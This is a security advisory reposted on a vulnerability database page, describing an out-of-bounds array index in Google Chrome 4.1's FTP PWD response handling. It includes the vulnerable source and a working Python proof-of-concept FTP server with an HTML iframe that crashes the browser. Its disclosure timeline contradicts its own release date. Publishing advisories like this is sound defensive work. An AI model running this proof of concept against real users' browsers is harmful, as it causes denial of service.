Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Google Chrome 4.1.249.1042 Array Indexing Bug

🗓️ 03 Apr 2010 00:00:00Reported by Tobias KleinType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 15 Views

Google Chrome 4.1.249.1042 OOB Array Indexing Bug Remote Cras

Code
`  
  
source:  
http://www.trapkit.de/advisories/TKADV2010-004.txt  
  
Title:Google Chrome OOB Array Indexing Bug   
Author: Tobias Klein  
Affected Software: Google Chrome <= 4.1.249.1042 (Build 42199)  
Remotely Exploitable: Yes  
Locally Exploitable: No  
Vendor URL: http://www.google.com/chrome/  
  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Advisory: Google Chrome OOB Array Indexing Bug   
Advisory ID: TKADV2010-004  
Revision: 1.0  
Release Date: 2010/03/31  
Last Modified: 2010/03/31  
Date Reported: 2010/03/21  
Author: Tobias Klein (tk at trapkit.de)  
Affected Software: Google Chrome <= 4.1.249.1042 (Build 42199)  
Remotely Exploitable: Yes  
Locally Exploitable: No  
Vendor URL: http://www.google.com/chrome/  
Vendor Status: Vendor has released an updated version  
  
  
======================  
Vulnerability Details:  
======================  
  
Google Chrome is vulnerable to an out-of-bounds array indexing bug, caused   
by the improper handling of FTP PWD command server responses. By persuading  
a victim to visit a specially-crafted web site containing an iframe   
pointing to a malicious FTP server, a remote attacker could exploit this   
bug and cause the browser to crash.  
  
This bug affects the trusted browser kernel (privileged supervisor of the   
activities of the sandboxed processes).  
  
Tested Chrome version (Microsoft Windows):  
  
Google Chrome 4.1.249.1042 (Build 42199)  
WebKit 532.5  
V8 1.3.18.22  
User Agent Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US)   
AppleWebKit/532.5 (KHTML, like Gecko)   
Chrome/4.1.249.1042 Safari/532.5  
  
  
==================  
Technical Details:  
==================  
  
File: net\ftp\ftp_network_transaction.cc  
  
[..]  
int FtpNetworkTransaction::ProcessResponsePWD(const FtpCtrlResponse&  
response) {  
switch (GetErrorClass(response.status_code)) {  
case ERROR_CLASS_INITIATED:  
return Stop(ERR_INVALID_RESPONSE);  
case ERROR_CLASS_OK: {  
// The info we look for should be on the first line.  
[1] std::string line = response.lines[0];  
if (line.empty())  
return Stop(ERR_INVALID_RESPONSE);  
[2] std::string::size_type quote_pos = line.find('"');  
if (quote_pos != std::string::npos) {  
[3] line = line.substr(quote_pos + 1);  
[4] quote_pos = line.find('"');  
if (quote_pos == std::string::npos)  
return Stop(ERR_INVALID_RESPONSE);  
[5] line = line.substr(0, quote_pos);  
}  
if (system_type_ == SYSTEM_TYPE_VMS)  
line = FtpUtil::VMSPathToUnix(line);  
[6] if (line[line.length() - 1] == '/')  
line.erase(line.length() - 1);  
current_remote_directory_ = line;  
next_state_ = STATE_CTRL_WRITE_TYPE;  
break;  
}  
case ERROR_CLASS_INFO_NEEDED:  
return Stop(ERR_INVALID_RESPONSE);  
case ERROR_CLASS_TRANSIENT_ERROR:  
return Stop(ERR_FAILED);  
case ERROR_CLASS_PERMANENT_ERROR:  
return Stop(ERR_FAILED);  
default:  
NOTREACHED();  
return Stop(ERR_UNEXPECTED);  
}  
return OK;  
}  
[..]  
  
[1] The string 'line' points to the FTP server response.  
[2] Search for the first double quote (") in the response.  
[3] Point one byte after the first double quote.  
[4] Find the next double quote.  
[5] Extract the substring from the current position until the second   
double quote.  
[6] Check the extracted substring for a '/'.  
  
If the FTP server response consists of two double quotes followed directly   
after each other the code at [5] will result in a substring with a length   
of zero bytes. This leads to an out-of-bounds array index   
(line[0xffffffff]) at [6] that results in an application crash.  
  
  
=================  
Proof of Concept:  
=================  
  
Malicious FTP server:  
  
K:\BUGS\CHROME>type poc.py  
from socket import *  
from struct import pack  
from time import sleep  
  
host = "0.0.0.0"  
port = 21  
  
s = socket(AF_INET, SOCK_STREAM)  
s.bind((host, port))  
s.listen(1)  
print "\n[+] Google Chrome (4.1.249.1042) Denial of Service poc"  
print "[+] Listening on port %d ..." % port  
  
cl, addr = s.accept()  
print "[+] Connection accepted from %s" % addr[0]  
  
buffer = "220 Google Chrome (4.1.249.1042) Denial of Service poc"  
buffer += "\r\n"  
cl.send(buffer)  
  
cl.recv(128)  
buffer = "331 Password required for anonymous."  
buffer += "\r\n"  
cl.send(buffer)  
  
cl.recv(128)  
buffer = "230 User anonymous logged in."  
buffer += "\r\n"  
cl.send(buffer)  
  
cl.recv(128)  
buffer = "215 UNIX Type: bib"  
buffer += "\r\n"  
cl.send(buffer)  
  
cl.recv(128)  
buffer = "257 \"\""  
buffer += "\r\n"  
cl.send(buffer)  
  
print "[+] Sending buffer: OK\n"  
  
sleep(1)  
cl.close()  
s.close()  
- - - - - ---  
  
Start the poc server:  
  
K:\BUGS\CHROME>python poc.py  
  
[+] Google Chrome (4.1.249.1042) Denial of Service poc  
[+] Listening on port 21 ...  
  
  
Open the following sample HTML page in Chrome:  
  
- - - - - ---  
<html>  
<body>  
<iframe name="POC" src="ftp://127.0.0.1">  
</body>  
<html>  
- - - - - ---  
  
  
=========   
Solution:   
=========  
  
Update to Google Chrome >= 4.1.249.1045.  
  
  
====================   
Disclosure Timeline:   
====================  
  
Format: year/month/day  
  
2010/03/21 - Chromium maintainers notified  
2010/03/22 - Patch developed by Chromium maintainers  
2010/03/30 - Fixed version of Google Chrome is available  
2010/02/22 - Release date of this security advisory  
  
  
========   
Credits:   
========  
  
Vulnerability found and advisory written by Tobias Klein.  
  
  
===========   
References:   
===========  
  
[REF1] http://googlechromereleases.blogspot.com/2010/03/stable-update-  
disable-translate.html  
[REF2] http://bugs.chromium.org/38845  
[REF3] http://www.trapkit.de/advisories/TKADV2010-004.txt  
  
  
========   
Changes:   
========  
  
Revision 0.1 - Initial draft release to the vendor  
Revision 1.0 - Public release  
  
  
===========  
Disclaimer:  
===========  
  
The information within this advisory may change without notice. Use  
of this information constitutes acceptance for use in an AS IS  
condition. There are no warranties, implied or express, with regard  
to this information. In no event shall the author be liable for any  
direct or indirect damages whatsoever arising out of or in connection  
with the use or spread of this information. Any use of this  
information is at the user's own risk.  
  
  
==================   
PGP Signature Key:   
==================  
  
http://www.trapkit.de/advisories/tk-advisories-signature-key.asc  
  
  
Copyright 2010 Tobias Klein. All rights reserved.  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP  
Charset: utf-8  
  
wj8DBQFLs6gPkXxgcAIbhEERAlH6AKD+UgqYNZpBD40+o7Yl8HjdsaVM1QCffMKa  
pqw8f2DGxim/+N1k+jCqbcQ=  
=mHHh  
-----END PGP SIGNATURE-----  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Apr 2010 00:00Current
0.1Low risk
Vulners AI Score0.1
google chromearray indexing bugremote exploitable
15